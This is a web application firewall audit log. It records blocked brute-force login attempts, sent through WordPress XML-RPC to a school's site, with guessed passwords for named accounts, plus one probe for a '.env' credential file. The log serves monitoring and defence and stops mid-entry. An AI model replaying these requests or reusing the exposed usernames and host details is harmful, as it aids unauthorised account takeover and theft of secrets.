Engine-Mode: "ENABLED" --80dde223-Z-- --69c36831-A-- [07/Jun/2025:16:21:54 +0700] aEQEsvClubEPOra_8UkjlgAAABM 103.236.140.4 43012 103.236.140.4 8181 --69c36831-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --69c36831-C-- wp.getUsersBlogs kesiswaan Marketing --69c36831-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69c36831-E-- --69c36831-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (105+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288114548561 4483 (- - -) Stopwatch2: 1749288114548561 4483; combined=3253, p1=374, p2=2727, p3=0, p4=0, p5=90, sr=68, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69c36831-Z-- --1ae38d1f-A-- [07/Jun/2025:16:22:54 +0700] aEQE7mCOO9DrcKL2J_4TwAAAANc 103.236.140.4 45400 103.236.140.4 8181 --1ae38d1f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1ae38d1f-C-- wp.getUsersBlogs kesiswaan 888888 --1ae38d1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ae38d1f-E-- --1ae38d1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (111+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288174693123 5040 (- - -) Stopwatch2: 1749288174693123 5040; combined=3882, p1=458, p2=3243, p3=0, p4=0, p5=107, sr=89, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ae38d1f-Z-- --0dd98d05-A-- [07/Jun/2025:16:23:54 +0700] aEQFKvClubEPOra_8UklCwAAABU 103.236.140.4 48304 103.236.140.4 8181 --0dd98d05-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0dd98d05-C-- wp.getUsersBlogs kesiswaan q1w2e3r4 --0dd98d05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0dd98d05-E-- --0dd98d05-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (111+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288234160310 5054 (- - -) Stopwatch2: 1749288234160310 5054; combined=3855, p1=452, p2=3204, p3=0, p4=0, p5=117, sr=87, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0dd98d05-Z-- --66fee25e-A-- [07/Jun/2025:16:24:54 +0700] aEQFZvClubEPOra_8UklhgAAAAg 103.236.140.4 51218 103.236.140.4 8181 --66fee25e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --66fee25e-C-- wp.getUsersBlogs kesiswaan 123456qwe --66fee25e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66fee25e-E-- --66fee25e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (118+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288294225894 5027 (- - -) Stopwatch2: 1749288294225894 5027; combined=3703, p1=518, p2=2999, p3=0, p4=0, p5=109, sr=83, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66fee25e-Z-- --dc24eb30-A-- [07/Jun/2025:16:25:20 +0700] aEQFgGCOO9DrcKL2J_4V6AAAAMY 103.236.140.4 52592 103.236.140.4 8181 --dc24eb30-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --dc24eb30-C-- wp.getUsersBlogs kesiswaan 1234%^&* --dc24eb30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc24eb30-E-- --dc24eb30-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288320903495 4782 (- - -) Stopwatch2: 1749288320903495 4782; combined=3279, p1=405, p2=2722, p3=0, p4=0, p5=92, sr=71, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc24eb30-Z-- --237ecd5d-A-- [07/Jun/2025:16:25:54 +0700] aEQFovClubEPOra_8UkmBAAAAA8 103.236.140.4 54224 103.236.140.4 8181 --237ecd5d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --237ecd5d-C-- wp.getUsersBlogs kesiswaan charlie --237ecd5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --237ecd5d-E-- --237ecd5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (122+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288354359768 5348 (- - -) Stopwatch2: 1749288354359768 5348; combined=3982, p1=484, p2=3309, p3=0, p4=0, p5=111, sr=87, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --237ecd5d-Z-- --7dd78038-A-- [07/Jun/2025:16:26:54 +0700] aEQF3vClubEPOra_8UkmfgAAAA0 103.236.140.4 57036 103.236.140.4 8181 --7dd78038-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7dd78038-C-- wp.getUsersBlogs kesiswaan a801016 --7dd78038-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7dd78038-E-- --7dd78038-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (127+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288414471211 5262 (- - -) Stopwatch2: 1749288414471211 5262; combined=3956, p1=471, p2=3305, p3=0, p4=0, p5=106, sr=87, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7dd78038-Z-- --fd089848-A-- [07/Jun/2025:16:27:54 +0700] aEQGGhK9gc79coX6mHSmSAAAAEc 103.236.140.4 59990 103.236.140.4 8181 --fd089848-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --fd089848-C-- wp.getUsersBlogs timkreatif testing --fd089848-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd089848-E-- --fd089848-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (116+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288474567702 5677 (- - -) Stopwatch2: 1749288474567702 5677; combined=3580, p1=540, p2=2855, p3=0, p4=0, p5=116, sr=83, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd089848-Z-- --865b9a23-A-- [07/Jun/2025:16:28:54 +0700] aEQGVhK9gc79coX6mHSnFwAAAFE 103.236.140.4 34860 103.236.140.4 8181 --865b9a23-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --865b9a23-C-- wp.getUsersBlogs timkreatif booboo --865b9a23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --865b9a23-E-- --865b9a23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (125+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288534481243 5381 (- - -) Stopwatch2: 1749288534481243 5381; combined=4225, p1=472, p2=3463, p3=0, p4=0, p5=161, sr=88, sw=129, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --865b9a23-Z-- --41ff8c20-A-- [07/Jun/2025:16:29:54 +0700] aEQGkpANhDjQAvBdMyH4MwAAAIg 103.236.140.4 37946 103.236.140.4 8181 --41ff8c20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 230 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --41ff8c20-C-- wp.getUsersBlogs timkreatif marketing2024_ --41ff8c20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41ff8c20-E-- --41ff8c20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (126+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288594357694 5812 (- - -) Stopwatch2: 1749288594357694 5812; combined=4128, p1=551, p2=3310, p3=0, p4=0, p5=156, sr=145, sw=111, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41ff8c20-Z-- --7d8bf07d-A-- [07/Jun/2025:16:30:54 +0700] aEQGzpANhDjQAvBdMyH40gAAAJA 103.236.140.4 40564 103.236.140.4 8181 --7d8bf07d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7d8bf07d-C-- wp.getUsersBlogs timkreatif samuel --7d8bf07d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d8bf07d-E-- --7d8bf07d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (74+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288654058303 5900 (- - -) Stopwatch2: 1749288654058303 5900; combined=4132, p1=489, p2=3444, p3=0, p4=0, p5=115, sr=89, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d8bf07d-Z-- --a8d8571c-A-- [07/Jun/2025:16:31:54 +0700] aEQHCpANhDjQAvBdMyH5XgAAAJU 103.236.140.4 43094 103.236.140.4 8181 --a8d8571c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a8d8571c-C-- wp.getUsersBlogs timkreatif access --a8d8571c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8d8571c-E-- --a8d8571c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (106+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288714261370 5838 (- - -) Stopwatch2: 1749288714261370 5838; combined=4210, p1=571, p2=3450, p3=0, p4=0, p5=112, sr=96, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8d8571c-Z-- --8a75df48-A-- [07/Jun/2025:16:32:41 +0700] aEQHORK9gc79coX6mHSqHwAAAEY 103.236.140.4 45184 103.236.140.4 8181 --8a75df48-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Pixel 3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --8a75df48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a75df48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749288761334587 774 (- - -) Stopwatch2: 1749288761334587 774; combined=335, p1=293, p2=0, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a75df48-Z-- --dc583d26-A-- [07/Jun/2025:16:32:54 +0700] aEQHRmCOO9DrcKL2J_4cmQAAANg 103.236.140.4 45796 103.236.140.4 8181 --dc583d26-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --dc583d26-C-- wp.getUsersBlogs timkreatif controller --dc583d26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc583d26-E-- --dc583d26-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (124+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288774268005 5353 (- - -) Stopwatch2: 1749288774268005 5353; combined=4066, p1=506, p2=3375, p3=0, p4=0, p5=110, sr=115, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc583d26-Z-- --77b50f7d-A-- [07/Jun/2025:16:33:54 +0700] aEQHgvClubEPOra_8UkrQAAAABE 103.236.140.4 48438 103.236.140.4 8181 --77b50f7d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --77b50f7d-C-- wp.getUsersBlogs timkreatif jessica --77b50f7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77b50f7d-E-- --77b50f7d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (126+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288834281251 5086 (- - -) Stopwatch2: 1749288834281251 5086; combined=3867, p1=459, p2=3228, p3=0, p4=0, p5=107, sr=77, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77b50f7d-Z-- --65cd5017-A-- [07/Jun/2025:16:33:58 +0700] aEQHhmCOO9DrcKL2J_4dQgAAANE 103.236.140.4 48630 103.236.140.4 8181 --65cd5017-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --65cd5017-C-- wp.getUsersBlogs timkreatif 1234%^&* --65cd5017-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --65cd5017-E-- --65cd5017-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: 